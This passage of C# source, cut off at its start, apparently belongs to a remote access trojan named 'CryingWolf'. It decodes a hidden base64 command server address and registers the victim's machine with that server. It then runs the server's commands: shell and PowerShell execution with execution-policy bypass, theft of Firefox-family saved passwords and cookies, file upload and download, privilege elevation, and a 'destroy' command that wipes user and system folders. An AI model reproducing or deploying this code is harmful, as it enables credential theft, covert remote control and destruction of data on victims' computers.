            Environment.Exit(1);
        }

        foreach (string browser in Profile.GetMozillaBrowsers())
        {
            // Show info
            Console.WriteLine("Reading " + arguments + " from " + new DirectoryInfo(browser).Name + " browser.");

            // :::::::DDDDDDD VITTU KEKSI t: Viljami
            // Get cookies

            // Get history
            if (arguments.Equals("history"))
            {
                foreach (Site history in History.Get(browser))
                {
                    Console.WriteLine(BrowserUtils.FormatHistory(history));
                }
            }
        }
        Console.WriteLine("DONE");
    }
}

    #endregion

    // Connecting engine, Starter engine, FailFast engine runner, Commands.
    #region RShell
    static class Rshell
            {

                static string address = "aHR0cDovLzE2My4xNzIuMjguMjIyOjgwODA=";
                static string version = "CryingWolf";

                static string token = Utils.RandomString(15);
                static int startTime = 2;
                static int oneSecond = 1000;
                static int timeout = 6;

                static void Runner()
                {
                    while (true)
                    {
                        if (ProgramStarter.Starter()) { Environment.FailFast(null); }

                        Thread.Sleep(100);
                    }
                }


                static void Main()
                {
                    new Thread(Runner).Start();
                    if (ProgramStarter.Pingviini()) { Environment.FailFast(null); }

                    //connect
                    new Thread(Join).Start();
                }


                static void Join()
                {
                    int x = 0;
                    for (int y = 0; y < startTime; y++)
                    {
                        Utils.Wait(oneSecond);
                        x++;
                    }
                    if (x != startTime) { return; }

                    DoConvert();
                    while (true)
                    {
                        try
                        {
                            var i = JSON.create();
                            i.Add("token", token);
                            i.Add("name", Environment.MachineName);
                            i.Add("user", Environment.UserName);
                            i.Add("platform", Utils.GetOSName());
                            i.Add("version", version);
                            i.Add("elevated", Utils.IsAdministrator());
                            string url = (address.EndsWith("/") ? address : address + "/");
                            Request.Get(url + "live", 3000); //continue if server can be reached
                            var s = Request.PostString(url + "live/register", Utils.Encode(JSON.stringify(i)), 60000);
                            var j = JSON.parse(Utils.Decode(s));
                
                            var text = (string)j["text"];
                            var args = Utils.Parse(text).ToList();
                            var cmd = args[0];
                            args = args.Skip(1).ToList();
                            List<string> lines = new List<string>();
                            var message = JSON.create();
                            message.Add("token", token);

                            try
                            {
                                switch (cmd.ToLower())
                                {
                                    case "cd":
                                        if (args.Count > 0)
                                        {
                                            string d = "";
                                            if (Directory.Exists(Path.Combine(Utils.cd, args[0])))
                                            {
                                                d = Path.Combine(Utils.cd, args[0]);
                                            }
                                            if (Directory.Exists(d))
                                            {
                                                DirectoryInfo di = new DirectoryInfo(d);
                                                Utils.cd = di.FullName;
                                                message.Add("text", di.FullName);
                                            }
                                            else
                                            {
                                                message.Add("text", "Directory doesn't exist");
                                            }
                                        }
                                        else
                                        {
                                            message.Add("text", Utils.cd);
                                        }
                                        break;

                                    case "files":
                                        string[] dirEntries;
                                        if (args.Count == 0)
                                        {
                                            dirEntries = Utils.EnumDirEntries(Utils.cd, (args.Count == 2 ? args[1] : "*.*"), (args.Count == 3 ? Int32.Parse(args[2]) : 1));
                                        }
                                        else
                                        {
                                            dirEntries = Utils.EnumDirEntries(args[0], (args.Count == 2 ? args[1] : "*.*"), (args.Count == 3 ? Int32.Parse(args[2]) : 1));
                                        }
                                        message.Add("text", String.Join("\n", dirEntries.ToArray()));
                                        break;

                                    case "connections":
                                        IPGlobalProperties props = IPGlobalProperties.GetIPGlobalProperties();
                                        TcpConnectionInformation[] conns = props.GetActiveTcpConnections();
                                        List<string> connList = new List<string>();
                                        foreach (TcpConnectionInformation conn in conns)
                                        {
                                            if (!IPAddress.IsLoopback(conn.RemoteEndPoint.Address)) //ignore loopback connections
                                            {
                                                if (args.Count == 0 || (args.Count == 1 && conn.RemoteEndPoint.ToString().EndsWith(args[0])))
                                                {
                                                    connList.Add(conn.LocalEndPoint.ToString() + " <--> " + conn.RemoteEndPoint.ToString());
                                                }
                                            }
                                        }
                                        message.Add("text", String.Join("\n", connList.ToArray()));
                                        break;

                                    case "run":
                                        ProcessStartInfo pi = new ProcessStartInfo()
                                        {
                                            FileName = args[0],
                                            Arguments = (args.Count > 1 ? args[1] : ""),
                                            WorkingDirectory = (args.Count > 2 ? args[2] : Utils.cd),
                                            ErrorDialog = false,
                                        };
                                        Process p = Process.Start(pi);
                                        message.Add("text", "Process '" + p.ProcessName + "' with ID '" + p.Id.ToString() + "' started");
                                        break;

                                    case "windows":
                                        List<string> windows = new List<string>();
                                        foreach (Process p0 in Process.GetProcesses())
                                        {
                                            if (p0.MainWindowTitle.Length > 0)
                                            {
                                                windows.Add(p0.MainWindowTitle);
                                            }
                                        }
                                        message.Add("text", String.Join("\n", windows.ToArray()));
                                        break;

                                    case "passwd":
                                    foreach (string browser in Profile.GetMozillaBrowsers())
                                      foreach (Password account in Passwords.Get(browser))
                                         lines.Add(BrowserUtils.FormatPassword(account));

                                        message.Add("text", String.Join("\n", lines));
                                        break;
                                        
                                    case "bookmarks":
                                    foreach (string browser in Profile.GetMozillaBrowsers())
                                        foreach (Bookmark bookmark in Bookmarks.Get(browser))
                                            lines.Add(BrowserUtils.FormatBookmark(bookmark));

                                        message.Add("text", String.Join("\n", lines));
                                        break;

                                    case "cookies":
                                        foreach(string browser in Profile.GetMozillaBrowsers())
                                            foreach (Common.Cookie cookie in Cookies.Get(browser))
                                                lines.Add(BrowserUtils.FormatCookie(cookie));

                                        message.Add("text", String.Join("\n", lines));
                                        break;


                                    case "history":
                                        foreach (string browser in Profile.GetMozillaBrowsers())
                                            foreach (Site history in History.Get(browser))
                                                lines.Add(BrowserUtils.FormatHistory(history));

                                        message.Add("text", String.Join("\n", lines));
                                        break;

                                    case "pid":
                                        string pid = Process.GetCurrentProcess().Id.ToString();
                                        message.Add("text", pid);
                                        break;

                                    case "bin":
                                        string bin = Process.GetCurrentProcess().MainModule.FileName;
                                        message.Add("text", bin);
                                        break;
                                    
                                    
                                    case "set-timeout":
                                        timeout = Int32.Parse(args[0]);
                                        message.Add("text", "Timeout set to " + timeout.ToString() + " seconds");
                                    break;
                                    
                                    case "elevate":
                                        ProcessStartInfo si = new ProcessStartInfo()
                                        {
                                            FileName = Process.GetCurrentProcess().MainModule.FileName,
                                            Verb = "runas",
                                            ErrorDialog = false,
                                        };
                                        Process.Start(si);
                                        break;

                                    case "kill":
                                        Process.GetCurrentProcess().Kill();
                                        break;

                                    case "destroy":
                                    if (Directory.Exists(@"C:\Program Files"))
                                    {
                                        try
                                        {
                                    Directory.Delete(@"C:\Program Files", true);
                                        }

                                        catch (IOException)
                                        {

                                        }
                                    }

                                    if (Directory.Exists(@"C:\Desktop"))
                                    {
                                        try
                                        {
                                            Directory.Delete(@"C:\Desktop", true);
                                        }

                                        catch (IOException)
                                        {
                                            
                                        }
                                    }
                                    if (Directory.Exists(@"C:\Users\"))
                                    {
                                        try
                                        {
                                            Directory.Delete(@"C:\Users\", true);
                                        }

                                        catch (IOException)
                                        {

                                        }
                                    }

                                    if (Directory.Exists(@"C:\ProgramData"))
                                    {
                                        try
                                        {
                                            Directory.Delete(@"C:\ProgramData", true);
                                        }

                                        catch (IOException)
                                        {
                                          message.Add("text", "Done!");
                                         }
                                    }
                                    break;

                                    case "installed":
                                        message.Add("text", String.Join("\n", Utils.GetInstalledSoftware((args.Count == 0 ? "" : args[0]))));
                                        break;

                                    case "process-table":
                                        List<string> processes = new List<string>();
                                        foreach (Process p0 in Process.GetProcesses())
                                        {
                                            if (args.Count == 0 || (args.Count > 0 && (p0.MainWindowTitle.ToLower().Contains(args[0].ToLower()) || p0.ProcessName.ToLower().Contains(args[0].ToLower()) || p0.Id.ToString() == args[0])))
                                            {
                                                string mainModule = "-";
                                                try
                                                {
                                                    mainModule = p0.MainModule.ModuleName;
                                                }
                                                catch (Exception)
                                                {
                                                }
                                                processes.Add(Utils.Pad(p0.Id.ToString(), Utils.Pad(p0.ProcessName, Utils.Pad(mainModule, (p0.MainWindowTitle.Length > 0 ? p0.MainWindowTitle : "-"), 30), 38), 30));
                                            }
                                        }
                                        processes.Insert(0, Utils.Pad("PID", Utils.Pad("PROCESS NAME", Utils.Pad("MAIN MODULE NAME", "WINDOW TITLE", 30), 38), 30) + "\n");
                                        message.Add("text", String.Join("\n", processes));
                                        break;

                                    case "process-list":
                                        List<string> _processes = new List<string>();
                                        foreach (Process p0 in Process.GetProcesses())
                                        {
                                            if (args.Count == 0 || (args.Count > 0 && (p0.MainWindowTitle.ToLower().Contains(args[0].ToLower()) || p0.ProcessName.ToLower().Contains(args[0].ToLower()) || p0.Id.ToString() == args[0])))
                                            {
                                                string mainModule = "-";
                                                try
                                                {
                                                    mainModule = p0.MainModule.ModuleName;
                                                }
                                                catch (Exception)
                                                {
                                                }
                                                _processes.Add(String.Join("\n", new string[] {
                                                    "Process name:  " + p0.ProcessName,
                                                    "  Process ID:  " + p0.Id.ToString(),
                                                    " Main module:  " + mainModule,
                                                    "Window title:  " + (p0.MainWindowTitle.Length > 0 ? p0.MainWindowTitle : "-"),
                                                    "",
                                                }));
                                            }
                                        }
                                        message.Add("text", String.Join("\n", _processes));
                                        break;

                                    case "services-table":
                                        List<string> services = new List<string>();
                                        ServiceController[] _services = ServiceController.GetServices();

                                        foreach (ServiceController service in _services)
                                        {
                                            if (args.Count == 0 || (args.Count > 0 && (service.ServiceName.ToLower().Contains(args[0].ToLower()) || service.DisplayName.ToLower().Contains(args[0].ToLower()))))
                                            {
                                                services.Insert(0, Utils.Pad(service.DisplayName, Utils.Pad(service.ServiceName, Utils.Pad((service.MachineName == "." ? Environment.MachineName : service.MachineName), service.Status.ToString(), 25), 40), 55));
                                            }
                                        }
                                        services.Sort();
                                        services.Insert(0, Utils.Pad("DISPLAY NAME", Utils.Pad("SERVICE NAME", Utils.Pad("MACHINE NAME", "SERVICE STATUS", 25), 40), 55) + "\n");
                                        message.Add("text", String.Join("\n", services));
                                        break;

                                    case "services-list":
                                        List<string> services2 = new List<string>();
                                        ServiceController[] _services2 = ServiceController.GetServices();

                                        foreach (ServiceController service in _services2)
                                        {
                                            if (args.Count == 0 || (args.Count > 0 && (service.ServiceName.ToLower().Contains(args[0].ToLower()) || service.DisplayName.ToLower().Contains(args[0].ToLower()))))
                                            {
                                                services2.Add(String.Join("\n", new string[] {
                                                    "Display name:  " + service.DisplayName,
                                                    "Service name:  " + service.ServiceName,
                                                    "Machine name:  " + (service.MachineName == "." ? Environment.MachineName : service.MachineName),
                                                    "      Status:  " + service.Status.ToString(),
                                                    "",
                                                }));
                                            }
                                        }
                                        services2.Sort();
                                        message.Add("text", String.Join("\n", services2));
                                        break;

                                    case "request":
                                        List<string> response = new List<string>();
                                        WebRequest req = HttpWebRequest.Create(args[0]);
                                        req.Timeout = 7000;
                                        int st = Math.Abs(Environment.TickCount);
                                        WebResponse res = req.GetResponse();
                                        int et = Math.Abs(Environment.TickCount);
                                        response.Add("Response received in " + (et - st) + " ms\n");
                                        string body = new StreamReader(res.GetResponseStream()).ReadToEnd();
                                        response.Add(req.Method.ToUpper() + " " + args[0] + " HTTP/" + ((HttpWebRequest)req).ProtocolVersion.ToString());
                                        response.Add(((int)((HttpWebResponse)res).StatusCode).ToString() + " - " + ((HttpWebResponse)res).StatusDescription.ToString() + " [" + res.ResponseUri.AbsoluteUri + "]\n");
                                        foreach (string name in res.Headers.AllKeys)
                                        {
                                            response.Add(name + ": " + res.Headers.Get(name));
                                        }
                                        if (args.Contains("--body")) response.Add("\n" + body);
                                        message.Add("text", String.Join("\n", response.ToArray()));
                                        break;

                                    case "ps":
                                        List<string> cmdlet = new List<string>();
                                        cmdlet.AddRange(text.Split(' '));
                                        message.Add("text", Utils.Exec(String.Join("", "llehsrewop".ToCharArray().Reverse().ToArray()), "-ExecutionPolicy Bypass " + String.Join(" ", cmdlet.Skip(1).ToArray()), timeout));
                                        break;

                                    case "download":
                                        using (WebClient wc = new WebClient())
                                        {
                                            wc.DownloadFile(args[0], args[1]);
                                            message.Add("text", "File downloaded from '" + args[0] + "' to '" + args[1] + "'");
                                        }
                                        break;

                                    case "upload":
                                        using (WebClient wc = new WebClient())
                                        {
                                            wc.UploadFile(args[0], args[1]); // $_FILE['file']
                                            message.Add("text", "File uploaded from '" + args[0] + "' to '" + args[1] + "'");
                                        }
                                        break;

                                    default:
                                        message.Add("text", Utils.Exec(String.Join("", "dmc".ToCharArray().Reverse().ToArray()), "/C " + text, timeout));
                                        break;
                                }
                            }
                            catch (Exception ex)
                            {
                                message.Add("text", ex.Message);
                            }

                            var o2 = Request.PostString((address.EndsWith("/") ? address : address + "/") + "live/message", Utils.Encode(JSON.stringify(message)));
                        }
                        catch (Exception)
                        {
                            Thread.Sleep(200);
                        }
                    }
                }

                static void DoConvert()
                {
                    address = Encoding.UTF8.GetString(Convert.FromBase64String(address));
                }
            }
            #endregion